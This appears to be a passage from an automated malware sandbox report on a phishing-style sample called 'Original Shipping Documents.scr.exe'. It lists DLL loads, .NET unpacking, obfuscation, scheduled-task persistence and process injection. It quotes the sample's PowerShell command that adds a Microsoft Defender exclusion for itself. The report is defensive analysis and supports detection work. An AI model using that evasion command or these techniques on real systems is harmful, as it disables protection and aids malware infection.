Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: scecli.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	Section loaded: wininet.dll
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	Section loaded: mswsock.dll
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	Section loaded: rasadhlp.dll

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\SecEdit.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Source: Original Shipping Documents.scr.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Original Shipping Documents.scr.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: Original Shipping Documents.scr.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: SecEdit.pdb source: Original Shipping Documents.scr.exe, 00000008.00000002.1741994583.0000000001768000.00000004.00000020.00020000.00000000.sdmp, xBk0IlKjg.exe, 0000000F.00000002.3849359280.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: SecEdit.pdbGCTL source: Original Shipping Documents.scr.exe, 00000008.00000002.1741994583.0000000001768000.00000004.00000020.00020000.00000000.sdmp, xBk0IlKjg.exe, 0000000F.00000002.3849359280.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: Original Shipping Documents.scr.exe, 00000008.00000002.1743279814.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, SecEdit.exe, 00000010.00000003.1741743139.0000000002829000.00000004.00000020.00020000.00000000.sdmp, SecEdit.exe, 00000010.00000002.3850619845.0000000002CC0000.00000040.00001000.00020000.00000000.sdmp, SecEdit.exe, 00000010.00000003.1744475115.0000000002B10000.00000004.00000020.00020000.00000000.sdmp, SecEdit.exe, 00000010.00000002.3850619845.0000000002E5E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Original Shipping Documents.scr.exe, Original Shipping Documents.scr.exe, 00000008.00000002.1743279814.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, SecEdit.exe, 00000010.00000003.1741743139.0000000002829000.00000004.00000020.00020000.00000000.sdmp, SecEdit.exe, 00000010.00000002.3850619845.0000000002CC0000.00000040.00001000.00020000.00000000.sdmp, SecEdit.exe, 00000010.00000003.1744475115.0000000002B10000.00000004.00000020.00020000.00000000.sdmp, SecEdit.exe, 00000010.00000002.3850619845.0000000002E5E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: dfxE.pdb source: Original Shipping Documents.scr.exe, xHOAJKcJeCXuc.exe.0.dr
Source:	Binary string: dfxE.pdbSHA256c source: Original Shipping Documents.scr.exe, xHOAJKcJeCXuc.exe.0.dr
Source:	Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: xBk0IlKjg.exe, 0000000F.00000000.1666851745.0000000000F1F000.00000002.00000001.01000000.0000000B.sdmp, xBk0IlKjg.exe, 00000011.00000000.1812032657.0000000000F1F000.00000002.00000001.01000000.0000000B.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: Original Shipping Documents.scr.exe, frm_Login.cs	.Net Code: InitializeComponent System.AppDomain.Load(byte[])
Source: xHOAJKcJeCXuc.exe.0.dr, frm_Login.cs	.Net Code: InitializeComponent System.AppDomain.Load(byte[])
Source: 0.2.Original Shipping Documents.scr.exe.9960000.3.raw.unpack, q4RPYX9Q3GcYEGPgYY.cs	.Net Code: iQmYTfXRWl System.Reflection.Assembly.Load(byte[])
Source: 0.2.Original Shipping Documents.scr.exe.7d30000.2.raw.unpack, MainForm.cs	.Net Code: _200F_206B_206F_200F_206D_206E_202A_200F_200C_202A_200F_206E_206A_206D_200C_202A_206D_200E_206B_200C_202A_202C_206A_202B_206B_206C_206E_206A_202B_206A_200E_202A_206C_202D_206C_200E_202E_206E_202D_200E_202E System.Reflection.Assembly.Load(byte[])
Source: 16.2.SecEdit.exe.32ecd14.2.raw.unpack, frm_Login.cs	.Net Code: InitializeComponent System.AppDomain.Load(byte[])
Source: 17.0.xBk0IlKjg.exe.2dacd14.1.raw.unpack, frm_Login.cs	.Net Code: InitializeComponent System.AppDomain.Load(byte[])
Source: 17.2.xBk0IlKjg.exe.2dacd14.1.raw.unpack, frm_Login.cs	.Net Code: InitializeComponent System.AppDomain.Load(byte[])
Source: 20.2.firefox.exe.3abcd14.0.raw.unpack, frm_Login.cs	.Net Code: InitializeComponent System.AppDomain.Load(byte[])

Suspicious powershell command line found

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Original Shipping Documents.scr.exe"
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Original Shipping Documents.scr.exe"			Jump to behavior

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 0_2_0547E5C0 push eax; retf	0_2_0547E5C1
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_004148AC push ds; iretd	8_2_00414975
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_004020CA push 00000042h; retf	8_2_004020CC
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_004148A3 push esp; retf	8_2_004148A4
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_0041490E push ds; iretd	8_2_00414975
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_00416123 pushad ; retn D6B9h	8_2_004161DB
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_004051A8 push edi; ret	8_2_004051D7
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_004073DF push eax; ret	8_2_004073E0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_00403400 push eax; ret	8_2_00403402
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_0040AD1E push ss; ret	8_2_0040AD20
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_0040858B push cs; ret	8_2_004085C2
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A409AD push ecx; mov dword ptr [esp], ecx	8_2_01A409B6
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 9_2_0126E5C0 push eax; retf	9_2_0126E5C1
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_0117C54F push 8B011067h; ret	13_2_0117C554
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_0117C54D pushfd ; ret	13_2_0117C54E
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_011309AD push ecx; mov dword ptr [esp], ecx	13_2_011309B6
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_0117C9D7 push edi; ret	13_2_0117C9D9
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_0110135E push eax; iretd	13_2_01101369
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_01101FEC push eax; iretd	13_2_01101FED
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_01187E99 push ecx; ret	13_2_01187EAC

Source: Original Shipping Documents.scr.exe	Static PE information: section name: .text entropy: 7.748600107096591
Source: xHOAJKcJeCXuc.exe.0.dr	Static PE information: section name: .text entropy: 7.748600107096591

Source: 0.2.Original Shipping Documents.scr.exe.9960000.3.raw.unpack, u70LQb3FBOcAsRPNHk.cs	High entropy of concatenated method names: 'Dispose', 'zk20HXXfyg', 'lujO2xdHWI', 'RG4K6VojW3', 'IPW0kBI8AI', 'Jd30zaubKF', 'ProcessDialogKey', 'P47O1T4sOs', 'pCmO0EbVoK', 'yN5OOTWHF3'
Source: 0.2.Original Shipping Documents.scr.exe.9960000.3.raw.unpack, xiZUgb0YtRinv3UjqPu.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'jwpKUf2ncd', 'W7aKQ8KDa1', 'Y0LKrn9PNV', 'fe1KKKrNjT', 'CAwKXWvJqq', 'IcRKcFg3yb', 'Ix2KjQvdiZ'
Source: 0.2.Original Shipping Documents.scr.exe.9960000.3.raw.unpack, OAVAaTg7HwwANjOZWN.cs	High entropy of concatenated method names: 'zwq7BaLRSk', 'Ah678G9gTR', 'BmT7TWCjQk', 'QMQ75phRgd', 'EHT7DhtqdA', 'd1M7IeppJw', 'Bc57lFbkNR', 'GXY7e6koLs', 'tye7uWny5A', 'roU7VRxdDV'
Source: 0.2.Original Shipping Documents.scr.exe.9960000.3.raw.unpack, DB6oMTFMpsnIShblX3.cs	High entropy of concatenated method names: 'OpF7siO4Qq', 'CxF7NpeWle', 'Egr7wbM4fb', 'VIqwk4v2Sp', 'sacwzWf7Nl', 'N7C7180SRH', 'bde70GLM1n', 'MTH7OBmJhD', 'ja47iFUp1Y', 'jLa7Y4VDua'
Source: 0.2.Original Shipping Documents.scr.exe.9960000.3.raw.unpack, q4RPYX9Q3GcYEGPgYY.cs	High entropy of concatenated method names: 'Sjxip3o46x', 'm6Dist1t6c', 'KEJi36wHu4', 'de2iN1CMCt', 'csYiCBt23a', 'ecUiwawDd6', 'W15i7pnHjy', 'h7ri9kFkBw', 'xS2ih0ux5h', 'z4ciyiERxa'
Source: 0.2.Original Shipping Documents.scr.exe.9960000.3.raw.unpack, oreZmI015Z308tDmyWP.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'HuPQoUQmC3', 'vFXQ41PcKg', 'y7wQdscH5K', 'D41QZj0atM', 'QFKQP1nL3X', 'v2nQn2KFJZ', 'R1pQqvLSVH'
Source: 0.2.Original Shipping Documents.scr.exe.9960000.3.raw.unpack, xDKT71OAvQISnCHaga.cs	High entropy of concatenated method names: 'wqETKidVe', 'p1H5wjSyR', 'hGxIsKpaU', 'sRHldnP4i', 'wu0uXdbtU', 'sUaVDoM0Q', 'vfbpEGfAlWkiB6Um2d', 'lftwKMRvt2Y4k7Klqr', 'iMBEMiYQp', 'i0tQctNtY'
Source: 0.2.Original Shipping Documents.scr.exe.9960000.3.raw.unpack, jT4sOsHWCmEbVoK8N5.cs	High entropy of concatenated method names: 'U3dUtbbSa6', 'nWZU2rB3dS', 'QhlUvJ5BBj', 'XkcULTWDx1', 'HxoUSM76vD', 'kGIUfjfslE', 'jbUUFRPYIE', 'NidUMuRTUq', 'TedUgTvs7q', 'IQlUm4Syhe'
Source: 0.2.Original Shipping Documents.scr.exe.9960000.3.raw.unpack, Vw3nT2nhyYdW7CTvPY.cs	High entropy of concatenated method names: 'ToString', 'QMCWotELj9', 'OthW2Xfv0l', 'z6EWvE2qDk', 'hclWL0bfT9', 'BJhWSubxnu', 'VNeWfEnImV', 'YkOWFvZLhV', 'OudWMqpVkM', 'rDXWgUysXP'
Source: 0.2.Original Shipping Documents.scr.exe.9960000.3.raw.unpack, z4ZVD7zCqlU1ats5Kk.cs	High entropy of concatenated method names: 'jpmQIXnrQp', 'VhZQeuHagU', 'fqkQumvj5a', 'qjxQtTHyDZ', 'K8uQ2aD2XQ', 'QcmQLb90aZ', 'PntQSPSrdt', 'HSZQjfj0DQ', 'wd6QBi53gj', 'PGcQ8rv1Ar'
Source: 0.2.Original Shipping Documents.scr.exe.9960000.3.raw.unpack, PsHuQfZqWhwBIk6cSG.cs	High entropy of concatenated method names: 'd9Aam19Tu7', 'plka47iMaJ', 'LyMaZ7UIXx', 'i4BaPJRj7m', 'fpQa2FarJv', 'qatavA3ri8', 'fGiaLYm9eR', 'UE6aShNUe4', 'YkUafB6imB', 'KRmaFV0Sip'
Source: 0.2.Original Shipping Documents.scr.exe.9960000.3.raw.unpack, yBCaXouy5eETR84Xs2.cs	High entropy of concatenated method names: 'nWIN5qgq0q', 'a9wNIUgZxW', 'PQGNe2dL83', 'z5LNu1UkPy', 'fjhNap0XQe', 'spnNW2KIMT', 'YRaNR4vFpk', 'UmLNETetKI', 'XRgNUtGPsM', 'RBJNQFfGI5'
